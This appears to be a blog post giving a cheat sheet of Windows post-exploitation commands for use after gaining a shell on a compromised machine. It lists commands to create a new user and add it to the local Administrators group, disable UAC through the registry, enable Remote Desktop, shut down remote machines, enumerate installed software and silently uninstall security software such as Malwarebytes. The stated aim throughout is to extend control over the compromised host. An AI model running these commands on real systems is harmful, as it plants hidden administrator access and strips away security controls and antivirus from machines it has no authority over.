Windows Post Exploitation Commands

So after we’ve gained our first shell we’ll need to execute a series of commands on the compromised system in order to gain further control and solidify our footprint.  The following are some of the more common Windows commands in no particular order.  

User Accounts & Groups:

Create a New Account

net user /add username password

or alternatively if you do not want to enter the password in plain text, run the following:

net user /add username *

and then enter the password in twice when prompted at the command line


Add User to Local Administrators Group

net localgroup administrators username /add


See Current User

whoami


See Current User’s Permissions

whoami /PRIV


See Local Admin Group Members

net localgroup administrators


See Local User Group Members

net localgroup users

______________________________________________________________________________

System Commands:

Remote Shutdown or Restart

shutdown -r -m \\computername


Configuring UAC

Disable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Enable UAC:

C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f


Configuring Remote Desktop

Enable RDP

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable RDP:

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f

______________________________________________________________________________

Enumerating Software:

See Installed Applications

wmic product Name — (this will enumerate all installed software on the system)

To narrow these results or check for specific applications try playing with the following:

wmic product where “Name like %Malwarebytes%” get Name, Version

wmic product where “Name=’Malwarebytes’” get Name, Version


Uninstall Applications Silently

wmic product where “Name=’Malwarebytes’” call uninstall /nointeractive

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *